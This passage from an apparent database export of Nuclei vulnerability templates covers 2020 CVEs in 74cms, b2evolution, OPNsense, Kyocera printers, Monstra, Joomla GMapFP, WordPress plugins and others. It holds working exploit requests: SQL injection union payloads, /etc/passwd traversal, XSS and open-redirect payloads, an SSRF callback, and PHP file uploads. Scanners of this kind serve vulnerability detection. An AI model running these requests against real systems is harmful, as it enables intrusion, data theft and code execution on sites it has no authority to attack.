'{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4b0a00483046022100b445b86b8bc851dfc73d48b1385c99d7ad711230fa56e43efd02d7755d29ea84022100bfc90c7ba695df767a9f32c5eb3a29bf895e0af68b1d4c163438eaf8bfc221b3:922c64590222798bb761d5b6d8e72950", "hash": "22a4d1e02d2c9c4629e1e67f151cf5e4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c4" }, "name": "CVE-2020-22209.yaml", "content": "id: CVE-2020-22209\n\ninfo:\n name: 74cms - ajax_common.php SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file.\n reference:\n - https://github.com/blindkey/cve_like/issues/12\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22209\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-22209\n cwe-id: CWE-89\n epss-score: 0.15522\n epss-percentile: 0.95775\n cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 74cms\n product: 74cms\n shodan-query: http.html:\"74cms\"\n fofa-query: app=\"74cms\"\n tags: cve,cve2020,74cms,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27'\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4a0a004730450221009e55b332e27a60cf87cccd81422880062f90e44d254777bb1ec7f9140fa0054502205fddccf82cfe56707866b8766e8b74347aef1bf754927ccb40079bb273c5b359:922c64590222798bb761d5b6d8e72950", "hash": "37632688afad5787a005c2e7aacca07c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c5" }, "name": "CVE-2020-22210.yaml", "content": "id: CVE-2020-22210\n\ninfo:\n name: 74cms - ajax_officebuilding.php SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file.\n reference:\n - https://github.com/blindkey/cve_like/issues/11\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22210\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-22210\n cwe-id: CWE-89\n epss-score: 0.20254\n epss-percentile: 0.95933\n cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 74cms\n product: 74cms\n shodan-query: http.html:\"74cms\"\n fofa-query: app=\"74cms\"\n tags: cve,cve2020,74cms,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4a0a00473045022100871fd309f948d3202f0de9e37571c921c7c90656777d3fd15ab38733ad2408c102204f62211c931f9e30ab1ff0bf20bb503191ed0af758f8fe2b0373f48ec8bcd315:922c64590222798bb761d5b6d8e72950", "hash": "46543fb068f149cdab68814dd4e340b1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c6" }, "name": "CVE-2020-22211.yaml", "content": "id: CVE-2020-22211\n\ninfo:\n name: 74cms - ajax_street.php 'key' SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms.\n reference:\n - https://github.com/blindkey/cve_like/issues/13\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22211\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-22211\n cwe-id: CWE-89\n epss-score: 0.20254\n epss-percentile: 0.95933\n cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 74cms\n product: 74cms\n shodan-query: http.html:\"74cms\"\n fofa-query: app=\"74cms\"\n tags: cve,cve2020,74cms,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23'\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 490a00463044022071b6a405d90f0054834aa1c5c3703f7bcb45b4f903a6bc652d448f4538db822a02200b1db00826ae2aff686f2d3c41ac214901596ef82ccf7dd22d40e04364765372:922c64590222798bb761d5b6d8e72950", "hash": "ae89d0837ebe0c530903030a6d8fab79", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c7" }, "name": "CVE-2020-22840.yaml", "content": "id: CVE-2020-22840\n\ninfo:\n name: b2evolution CMS <6.11.6 - Open Redirect\n author: geeknik\n severity: medium\n description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n This vulnerability can be exploited by attackers to trick users into visiting malicious websites, potentially leading to phishing attacks, malware infections, or unauthorized access to sensitive information.\n remediation: |\n Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840).\n reference:\n - https://github.com/b2evolution/b2evolution/issues/102\n - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html\n - https://www.exploit-db.com/exploits/49554\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22840\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-22840\n cwe-id: CWE-601\n epss-score: 0.01043\n epss-percentile: 0.82334\n cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: b2evolution\n product: b2evolution\n tags: cve,cve2020,packetstorm,edb,redirect,b2evolution\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$'\n# digest: 4b0a00483046022100aca101d54608e4e381651f80543d9c794c8e167de5bccd3a26b0fc1482f400880221009b0b916ed079773a3de491811b7feec2d0605abf868ef138cadb557821e59d36:922c64590222798bb761d5b6d8e72950", "hash": "cab135b8d197157108e77695b11ca04f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c8" }, "name": "CVE-2020-23015.yaml", "content": "id: CVE-2020-23015\n\ninfo:\n name: OPNsense <=20.1.5 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the disclosure of sensitive information.\n remediation: |\n Upgrade OPNsense to a version higher than 20.1.5 to mitigate the vulnerability.\n reference:\n - https://github.com/opnsense/core/issues/4061\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23015\n - https://github.com/anonymous364872/Rapier_Tool\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-23015\n cwe-id: CWE-601\n epss-score: 0.00179\n epss-percentile: 0.54178\n cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: opnsense\n product: opnsense\n tags: cve2020,cve,redirect,opnsense\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?url=http://interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$'\n# digest: 4a0a00473045022100ae77234850dda3e92b7d3c070dd3f65e32ec805f1ebe87e6bf894a33e0bcee1802201e520db0d31b87bd98524bf3edc556e65db0ce4929df90d482ddf582fe4457b7:922c64590222798bb761d5b6d8e72950", "hash": "eebd91387c78e2d7ede01df3079a0c1f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c9" }, "name": "CVE-2020-23517.yaml", "content": "id: CVE-2020-23517\n\ninfo:\n name: Aryanic HighMail (High CMS) - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23517\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-23517\n cwe-id: CWE-79\n epss-score: 0.00132\n epss-percentile: 0.47292\n cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: aryanic\n product: high_cms\n shodan-query: title:\"HighMail\"\n fofa-query: title=\"HighMail\"\n tags: cve,cve2020,xss,cms,highmail,aryanic\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n - \"{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'value=\"\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b35fbfad637dec46e02dd52e3937c9a7946b832a92b5a742cda3d4a51e77d0ec02207e01bdf1cc3c1558864bc97d6685f1c982f8ecf5c977021caae8a5c017963601:922c64590222798bb761d5b6d8e72950", "hash": "ffe2389a229ebdbd51532fec1789f070", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ca" }, "name": "CVE-2020-23575.yaml", "content": "id: CVE-2020-23575\n\ninfo:\n name: Kyocera Printer d-COPIA253MF - Directory Traversal\n author: 0x_Akoko\n severity: high\n description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/48561\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23575\n - https://www.kyoceradocumentsolutions.com.tr/tr.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-23575\n cwe-id: CWE-22\n epss-score: 0.01489\n epss-percentile: 0.85494\n cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kyocera\n product: d-copia253mf_plus_firmware\n tags: cve2020,cve,printer,iot,lfi,edb,kyocera\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"root:.*:0:0:\"\n - \"bin:.*:1:1\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205f12eef681cfdc5b25284c5454a90ded2df8a57c3ce88dc0b02c875889c55b3d022024a97cc9f5593bc334188272f41626107d090fd8b46cc923f55db4fecd61205f:922c64590222798bb761d5b6d8e72950", "hash": "7d8c1e78047618ad7fa2fc6f12b12e11", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081cb" }, "name": "CVE-2020-23697.yaml", "content": "id: CVE-2020-23697\n\ninfo:\n name: Monstra CMS 3.0.4 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the page feature in admin/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/monstra-cms/monstra/issues/463\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23697\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-23697\n cwe-id: CWE-79\n epss-score: 0.0009\n epss-percentile: 0.37812\n cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: monstra\n product: monstra_cms\n tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated,monstra\nvariables:\n string: \"{{to_lower('{{randstr}}')}}\"\n\nhttp:\n - raw:\n - |\n POST /admin/index.php?id=dashboard HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n login={{username}}&password={{password}}&login_submit=Log+In\n - |\n GET /admin/index.php?id=pages&action=add_page HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n - |\n POST /admin/index.php?id=pages&action=add_page HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n - |\n GET /{{string}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(header_4, \"text/html\")'\n - 'status_code_4 == 200'\n - 'contains(body_4, \">\") && contains(body_4, \"Monstra\")'\n condition: and\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - 'id=\"csrf\" name=\"csrf\" value=\"(.*)\">'\n internal: true\n part: body\n# digest: 490a004630440220388c291d21538ae9468cbf1003d57432e845e76f6e5ca57401c295990dbfa3c802201e068fb257170a9fd9eb666b68ebba98a088c87a3f79ab04d71631a4170816d9:922c64590222798bb761d5b6d8e72950", "hash": "f152946d8d5eec8753a8dc52622b556a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081cc" }, "name": "CVE-2020-23972.yaml", "content": "id: CVE-2020-23972\n\ninfo:\n name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload\n author: dwisiswant0\n severity: high\n description: |\n Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application\n without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.\n remediation: |\n Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49129\n - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md\n - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23972\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-23972\n cwe-id: CWE-434\n epss-score: 0.53621\n epss-percentile: 0.9756\n cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\\!:*:*\n metadata:\n max-request: 2\n vendor: gmapfp\n product: gmapfp\n framework: joomla\\!\n tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\\!\nvariables:\n name: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - raw:\n - |\n POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n Referer: {{BaseURL}}\n Connection: close\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"option\"\n\n com_gmapfp\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\n Content-Type: text/html\n\n projectdiscovery\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"no_html\"\n\n no_html\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n\n payloads:\n component:\n - \"com_gmapfp\"\n - \"comgmapfp\"\n\n extractors:\n - type: regex\n regex:\n - \"window\\\\.opener\\\\.(changeDisplayImage|addphoto)\\\\(\\\"(.*?)\\\"\\\\);\"\n part: body\n# digest: 4b0a00483046022100e63b322ff55fa79a7de810f96ac018fe740ac8632e0532cb83816f0dbe09eab1022100b402ab341d6e7fd5f75477f035b28345da5313727856556e321cf238859fe49a:922c64590222798bb761d5b6d8e72950", "hash": "a99ad8d32cf558235fac4661ad5db8cf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081cd" }, "name": "CVE-2020-24148.yaml", "content": "id: CVE-2020-24148\n\ninfo:\n name: Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery\n author: dwisiswant0\n severity: critical\n description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.\n remediation: |\n Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability.\n reference:\n - https://github.com/dwisiswant0/CVE-2020-24148\n - https://wordpress.org/plugins/import-xml-feed/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24148\n - https://github.com/secwx/research/blob/main/cve/CVE-2020-24148.md\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n cvss-score: 9.1\n cve-id: CVE-2020-24148\n cwe-id: CWE-918\n epss-score: 0.15451\n epss-percentile: 0.95765\n cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: mooveagency\n product: import_xml_and_rss_feeds\n framework: wordpress\n fofa-query: body=\"import-xml-feed\"\n tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Import XML feed'\n\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450221008907b33fa8964132104119ef61c647b4ac492fb6758e4d425a2e2e06c366b968022006bc6c08457da183de8a277b67987bfcd2c316abba26adfeb9d24a31aed2b689:922c64590222798bb761d5b6d8e72950", "hash": "6620a1a5bc16368a6fd1ea6f8e697936", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ce" }, "name": "CVE-2020-24186.yaml", "content": "id: CVE-2020-24186\n\ninfo:\n name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution\n author: Ganofins\n severity: critical\n description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.\n impact: |\n Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.\n remediation: |\n Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.\n reference:\n - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24186\n - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/\n - http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2020-24186\n cwe-id: CWE-434\n epss-score: 0.97448\n epss-percentile: 0.99947\n cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: gvectors\n product: wpdiscuz\n framework: wordpress\n tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors\n\nhttp:\n - raw:\n - |\n GET /?p=1 HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n X-Requested-With: XMLHttpRequest\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n\n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"action\"\n\n wmuUploadFiles\n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"wmu_nonce\"\n\n {{wmuSecurity}}\n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"wmuAttachmentsData\"\n\n undefined\n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\n Content-Type: image/png\n\n {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n \n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"postId\"\n\n 1\n ------WebKitFormBoundary88AhjLimsDMHU1Ak--\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'success\":true'\n - 'fullname'\n - 'shortname'\n - 'url'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: wmuSecurity\n group: 1\n regex:\n - 'wmuSecurity\":\"([a-z0-9]+)'\n internal: true\n part: body\n\n - type: regex\n group: 1\n regex:\n - '\"url\":\"([a-z:\\\\/0-9-.]+)\"'\n part: body\n# digest: 4b0a00483046022100e38932a4bbaeb966d0ff133b826f339af5d5ced828fa938d65afd4ca069940b602210086ec11b8bf600caea0125a35dd2eab8c0843a0335c30b73c7a29838c73c03bca:922c64590222798bb761d5b6d8e72950", "hash": "acb80dc46edcce2c146449ed564626eb", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081cf" }, "name": "CVE-2020-24223.yaml", "content": "id: CVE-2020-24223\n\ninfo:\n name: Mara CMS 7.5 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/48777\n - https://sourceforge.net/projects/maracms/\n - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24223\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24223\n cwe-id: CWE-79\n epss-score: 0.0069\n epss-percentile: 0.79693\n cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mara_cms_project\n product: mara_cms\n tags: cve2020,cve,mara,xss,edb,mara_cms_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c184f6cf7e4218d7dc019d2c5ea69521956dec299e26d63e7d225fdfa6ff333202206a684eb7713168bde079f4ecbe55ba8abfc7056a40ec4a4306788f69e880bb70:922c64590222798bb761d5b6d8e72950", "hash": "6fa7f550c44e8d61ed1e575e98b91970", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d0" }, "name": "CVE-2020-24312.yaml", "content": "id: CVE-2020-24312\n\ninfo:\n name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure\n author: x1m_martijn\n severity: high\n description: |\n mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information, such as database backups, configuration files, and other sensitive data.\n remediation: |\n Update the WordPress Plugin File Manager (wp-file-manager) to the latest version to mitigate the backup disclosure vulnerability.\n reference:\n - https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24312\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-24312\n cwe-id: CWE-552\n epss-score: 0.02041\n 